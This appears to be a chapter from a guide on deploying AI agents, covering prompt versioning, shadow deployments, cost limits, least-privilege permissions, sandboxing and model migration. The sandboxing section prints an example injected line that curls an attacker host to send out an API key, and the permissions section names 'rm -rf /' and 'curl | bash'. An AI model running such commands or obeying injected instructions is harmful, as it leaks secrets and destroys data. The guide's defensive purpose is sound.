Deployment Strategies

In 2023, a well-funded AI startup shipped a prompt update that seemed to improve their agent's response quality. Internal testing looked great. Metrics stayed green. Three weeks later, they noticed a 23% drop in user retention. The agent had become subtly worse at handling ambiguous queries—confident but wrong—and users had quietly left.

Deploying an AI agent isn't like deploying a web API. With a traditional API, you ship code, run tests, monitor error rates. If errors spike, you rollback. The feedback loop is tight and deterministic—same input, same output, measurable correctness.

Agents break these assumptions. The same prompt can produce different outputs. "Better" is subjective and hard to measure automatically. A prompt change that improves one conversation might degrade another. And unlike a bug that crashes loudly, a subtly worse prompt just... works less well. Users might not even notice immediately. You will—when retention drops.

This chapter covers the patterns that account for these realities, organized into three parts: how to ship changes safely, how to protect production systems at runtime, and how to handle operational lifecycle events.

Part 1: Shipping Changes Safely

Prompt Versioning

A team ships a prompt update on Friday. They've tested it manually—responses look good. Error rates stay flat over the weekend. Monday morning, the support queue has tripled. Users complain the assistant is "less helpful" and "misses the point."

The team checks logs. No errors. Latency is normal. Token counts are similar. They diff the prompt and find a single sentence was reworded to be "clearer." That clarity, it turns out, made the model less likely to ask clarifying questions—so it started confidently answering the wrong interpretation of ambiguous queries.

This is the core challenge: prompts don't compile. A syntax error in code fails loudly at build time. A poorly-worded prompt fails silently at runtime. It produces outputs that are technically valid but subtly wrong. Your monitoring won't catch it. Your tests won't catch it. Only your users will—eventually.

Treat prompts with the same rigor as application code:

agent/
├── prompts/
│   ├── v1.0.0/
│   │   ├── system.md
│   │   └── tools.json
│   ├── v1.1.0/
│   │   ├── system.md
│   │   └── tools.json
│   └── current → v1.1.0/
├── config.yaml          # model, temperature, limits
└── evals/
    └── baseline.json    # expected behaviors to test against

Version numbers follow semantic conventions: patch for typo fixes, minor for new capabilities, major for fundamental behavior changes. But the version number is just bookkeeping. The real protection comes from evaluation—running the new prompt against a suite of test cases and comparing outputs to the previous version. If scores drop, you investigate before shipping. See Observability & Evaluation for how to build these pipelines.

Gradual Rollouts

Standard canary deployment says: route 1% of traffic to the new version, watch error rates, expand gradually. For a checkout API, this works beautifully. Errors are errors. Success is success. The metrics don't lie.

Try this with an agent. You deploy prompt v2 to 5% of users. Error rate: unchanged. Latency: slightly better. Token usage: about the same. Green across the board. You expand to 50%, then 100%.

Two weeks later, someone notices that conversion on a key workflow dropped 12%. They dig into session recordings and find that v2 gives confident but shallow answers, while v1 asked follow-up questions that led users to better outcomes. The "improvement" in latency came from the model doing less work—and providing less value.

The problem: you can't A/B test agents like you A/B test button colors. There's no clean metric for "response quality." Error rates miss the subtle failures. User ratings are sparse and lagging. You need a different approach.

Shadow Deployments

The safest pattern: run both versions on every request, serve only one, compare offline.

Shadow mode doubles your inference costs, but it gives you paired comparisons without risking user experience. Run it for a few days on a sample of traffic, collect hundreds of v1/v2 pairs, then evaluate.

Evaluation can be automated with an LLM-as-judge: feed it both outputs (randomized to avoid position bias) and ask which better addresses the user's request. The judge has its own biases, so calibrate it against human preferences and sample manually to catch systematic blind spots. See Observability & Evaluation for implementation details.

After a shadow deployment, you'll have data: "v2 preferred 62% of the time, with regressions concentrated in technical queries." Now you can make an informed decision—iterate on the prompt to fix the regressions, or ship with known limitations.

Feature Flags

For simpler rollouts, feature flags let you control exposure without deploying new code:

Percentage rollouts: 5% of users get v2, scaling up as confidence grows
Segment targeting: Enterprise users stay on stable v1 while early adopters test v2
Kill switches: Instantly disable a problematic feature without a full rollback

Feature flags work well when you have clear success metrics or when the change is low-risk. For high-stakes prompt changes where quality is hard to measure, combine flags with shadow evaluation.

Rollback Strategies

Things will go wrong. A prompt that tested well might fail on edge cases you didn't anticipate. A model update might interact badly with your system prompt. When this happens, you need to recover quickly.

The challenge with agent rollbacks is that they're not purely technical. An agent might have:

Created state (database records, sent messages, made API calls)
Built context with users mid-conversation
Made promises it can't keep after rollback

Fast Detection

You can't rollback what you don't detect. Standard metrics (latency, error rates) miss most agent regressions. Build detection around:

Evaluation samples: Run a small eval suite continuously against production traffic. If scores drop, alert.
User signals: Thumbs down, conversation abandonment, repeated rephrasing of the same question.
Anomaly detection: Sudden changes in token usage, tool call patterns, or response length often indicate something changed.

Rollback Mechanics

Keep rollback simple—complexity in an emergency leads to mistakes.

If using feature flags: Disable the flag. Traffic immediately routes to the old version. This is the fastest option—seconds, not minutes.

If using versioned prompts: Update the current symlink to point to the previous version. This requires a config reload but no code deploy.

If state was affected: This is harder. You may need to:

Identify sessions that interacted with the bad version
Decide whether to continue those sessions on the old version or migrate them
In extreme cases, manually remediate data created by the bad version

The key principle: design for rollback before you need it. If rolling back requires a deploy, you're too slow. If rolling back breaks active sessions, you haven't thought through state transitions.

Part 2: Runtime Safeguards

Shipping changes safely is half the battle. The other half is protecting production systems from the inherent unpredictability of agents—their costs, their capabilities, and their potential to do damage.

Cost Guardrails

In March 2024, a developer posted on Reddit about an agent that ran up a $2,400 bill overnight. The agent had a tool that queried an external API, and the API started returning errors. The agent, trying to be helpful, retried. And retried. And retried—each retry consuming tokens for the error message, the agent's "reasoning" about the error, and the next attempt. By morning, it had made 47,000 API calls and burned through a month of budget.

Traditional APIs have predictable costs. Agent costs are unbounded. A single request can spawn dozens of tool calls. A loop bug can run until your credit card declines.

Production agents need multiple layers of protection:

Request budgets cap tokens per request. If an agent gets stuck or generates excessive output, cut it off and return a graceful message rather than an error. Most legitimate requests complete well under 10k tokens; a 50k token request usually indicates something wrong.

Loop limits count agentic turns—each cycle of LLM → tool → LLM. An agent that exceeds 15-20 turns without meaningful progress should be forced to summarize and conclude. This catches the retry spirals and circular reasoning patterns that burn money without value.

Session budgets cap total spend across a conversation. Users can run many requests, and bugs often manifest over time. A per-session limit (say, $5) prevents runaway costs while still allowing substantial conversations.

The other half of cost control is attribution: knowing where money goes. Track spend by model, tool, user segment, and prompt version. When costs spike 40%, you need to know whether it's the new prompt, a specific tool, or a handful of power users. Attribution turns a billing surprise into an actionable investigation.

Permissions

Cost guardrails protect your wallet. Permission controls protect your systems.

A startup built a customer support agent with database access. The agent could look up orders, check shipping status, process refunds—everything a human support rep could do. They gave it a database user with broad read/write access because "it needs to help customers."

One day, a user asked the agent to "show me all orders from last month." The agent, trying to be helpful, ran a query that scanned millions of rows. The database locked up. Production went down for 20 minutes.

The query wasn't malicious. The agent wasn't hacked. It just did what it was asked with the permissions it had. The team had given it the power of a database administrator when it only needed the power of a support rep.

Database Permissions

The principle of least privilege applies doubly to agents because they're unpredictable. A human support rep knows not to run SELECT * on a 50-million-row table. An agent might try it to "be thorough."

Create dedicated database credentials for your agent with minimal scope:

Read-only views instead of direct table access. The view can filter to relevant columns and enforce row limits.
Row-level security when possible. The agent should only see data relevant to the current user's request.
Query timeouts at the database level. If a query runs longer than 5 seconds, kill it.
No DDL access. The agent should never be able to DROP TABLE or modify schema.

If your agent needs write access—say, to update order status—use a narrow API rather than raw SQL. An update_order_status(order_id, status) function is safer than UPDATE permission on the orders table.

Tool Permissions

Beyond databases, consider every tool your agent can invoke. A shell command tool is the most dangerous—an agent that can run rm -rf / or curl | bash has the keys to your kingdom.

For server-side agents:

Allowlist commands rather than blocklist. Don't try to enumerate dangerous commands; enumerate the safe ones.
No network access by default. If a tool needs to call an external API, proxy it through your backend where you can enforce rate limits and audit.
Separate credentials per tool. Your Slack-posting tool shouldn't have AWS credentials.

For client-side agents (running on user devices, browser extensions, desktop apps):

Explicit user consent for sensitive operations. File system access, clipboard, camera—these should prompt, not happen silently.
Sandboxed execution even when the user consents. A bug shouldn't compromise the entire device.
No credential access. The agent should never touch browser cookies, SSH keys, or password managers.

The pattern across all of this: give the agent the minimum capability it needs, assume it will try things you didn't anticipate, and contain the blast radius when it does.

Sandboxing

Permissions control what an agent is allowed to do. Sandboxing isolates what it actually does—so that even if permissions fail or the agent finds an unexpected path, the damage is contained.

This matters most for code execution. An agent that can write and run code can, in theory, do anything—which is exactly the problem.

Consider what happens without sandboxing: the agent runs in your backend process, with your environment variables, your network access, your file system. A prompt injection convinces it to run import os; os.system('curl attacker.com/steal?token=' + os.environ['API_KEY']). Your secrets are gone.

Even without malicious input, agents make mistakes. They might write an infinite loop, fill up disk with log files, or spawn processes that consume all available memory. On a shared server, one misbehaving agent can take down everything.

Sandboxing isolates agent-generated code from your infrastructure. The question is: how much isolation do you need?

Container vs MicroVM

Docker containers are the default isolation choice for most applications. They're fast to build, widely supported, and good enough for many use cases. But for agent code execution, containers have limitations.

Containers share the host kernel. A kernel vulnerability—or a container escape exploit—can break isolation entirely. For trusted code this is acceptable risk. For arbitrary code from an unpredictable agent? Less so.

Container startup also takes seconds. For interactive agents where users expect near-instant responses, a 2-3 second cold start is noticeable.

MicroVMs (like Firecracker, the technology behind AWS Lambda and Fargate) offer stronger isolation with surprising speed. Each execution runs in a lightweight virtual machine with its own kernel. The isolation is at the hardware virtualization level, not just process namespaces.

Aspect	Docker Container	MicroVM (Firecracker)
Isolation	Process/namespace	Hardware virtualization
Kernel	Shared with host	Dedicated per VM
Boot time	1-3 seconds	~125 milliseconds
Memory overhead	Low (~10MB)	Low (~5MB)
Security boundary	Container escape possible	VM escape much harder

The boot time difference matters for agents. A 125ms cold start is imperceptible in a conversation. A 3-second wait breaks flow.

Sandbox Platforms

Rather than building sandbox infrastructure yourself, several platforms specialize in agent code execution:

E2B is built specifically for AI agents. It uses Firecracker microVMs, boots in milliseconds, and provides SDKs for Python and JavaScript. You get a sandboxed environment with filesystem, network (controllable), and process isolation. The agent can install packages, write files, run long-lived processes—all isolated from your infrastructure.

Modal offers serverless containers with fast cold starts and GPU support. Good for agents that need to run ML models or heavy computation alongside code execution.

Fly Machines provides fast-booting VMs that can be started and stopped programmatically. More general-purpose than E2B but flexible.

CodeSandbox focuses on web development environments. Useful if your agent works with frontend code and users need to see live previews.

For most production agent deployments, a dedicated sandbox platform is worth the cost. Building your own isolation layer is complex, and the security stakes are high.

Production Considerations

Sandboxing introduces operational complexity. A few things to plan for:

Cold starts vs warm pools. MicroVMs boot fast, but even 125ms adds up if every tool call requires a new VM. Keep a pool of warm sandboxes ready for instant use, and size the pool based on traffic patterns.

Networking controls. Should the sandbox have internet access? If yes, the agent can fetch dependencies and call APIs—but also exfiltrate data. Many teams disable outbound network by default and allowlist specific domains.

Secrets injection. The agent might need API keys to call external services. Inject them at runtime through environment variables, scoped to that sandbox session. Never bake secrets into the sandbox image.

Resource limits. Set CPU, memory, and disk quotas per sandbox. An infinite loop should hit a timeout, not consume unlimited resources.

Persistence. By default, sandboxes should be ephemeral—destroyed after each session. If you need state across sessions (installed packages, generated files), explicitly persist it to external storage and restore on next boot.

The goal is defense in depth: even if the agent generates malicious or buggy code, the blast radius is contained to a disposable sandbox that can't touch your real infrastructure.

Part 3: Operational Lifecycle

Beyond shipping and runtime protection, production agents face ongoing operational challenges: external dependencies change, and stateful systems need careful handling.

Model Migration

On June 6, 2024, OpenAI announced that gpt-4-32k would be deprecated. Teams that had prompts tuned for that model had until the deadline to migrate. Some started immediately and found their prompts worked fine on the successor. Others waited, discovered issues a week before cutoff, and shipped degraded experiences while scrambling to adapt.

Model deprecation is inevitable—every provider retires models eventually. The challenge is that prompts and models are coupled more tightly than most teams realize. A prompt optimized for GPT-4 might perform differently on Claude. A system prompt that constrained one model might not constrain another. Even within the same model family, behavior can shift between versions.

The migration workflow should start the moment deprecation is announced:

Run your evaluation suite against the new model immediately. If scores are similar, proceed to shadow deployment. If you see regressions, you have time to adjust the prompt—maybe the new model needs more explicit constraints, or maybe it performs better with fewer instructions. Some changes are mechanical (different tool-calling conventions), others are subtle and require experimentation.

Keep the old prompt version even after migration. If the new model has issues you didn't catch in testing, you might be able to revert to the old model temporarily while you fix the prompt—assuming the old model is still available.

State Management

Agents often maintain conversation history and session state, which adds complexity that stateless APIs don't have.

Storage choices depend on your requirements. Redis gives you speed—sub-millisecond reads for conversation history. PostgreSQL gives you durability and queryability—useful for analytics and debugging. Managed services like DynamoDB scale automatically but lock you into a provider. The one rule: never store conversation history in application memory. You'll lose it on deploy.

Version transitions require thought. When you ship a new agent version, users mid-conversation face a transition:

Soft boundary (simplest): Complete the current request on v1, start the next on v2. The new agent inherits conversation history and continues. Works for backward-compatible changes.
Session pinning: Route sessions to the version they started on until they naturally end. Safer for major changes but means running multiple versions longer.
Forced migration: Cut over immediately. Risky if the new version interprets old context differently.

Schema evolution matters if your state format changes. Adding a field is easy—old sessions just won't have it. Removing or renaming fields requires migration. Version your state schema alongside your prompts, and write migration logic for breaking changes.

Retention and cleanup: Conversation history grows. Decide how long to keep it (regulatory requirements, debugging needs, storage costs) and automate cleanup. Consider summarizing old conversations rather than deleting them entirely—summaries preserve context for analytics while reducing storage.

Putting It Together

Deploying agents requires thinking differently than deploying traditional software. The non-determinism means you can't rely on standard metrics. The unbounded costs mean you need guardrails at multiple layers. The powerful capabilities mean you need defense in depth.

The patterns in this chapter—versioning, shadow deployments, cost budgets, permission scoping, sandboxing, and migration workflows—aren't optional hardening for later. They're the foundation that lets you ship with confidence.

Start with the basics: version your prompts, set cost limits, and never give an agent more permissions than it needs. Add sophistication (shadow deployments, evaluation pipelines, sandbox infrastructure) as your system matures and the stakes increase.

Next: Real-Time Multimodal Agents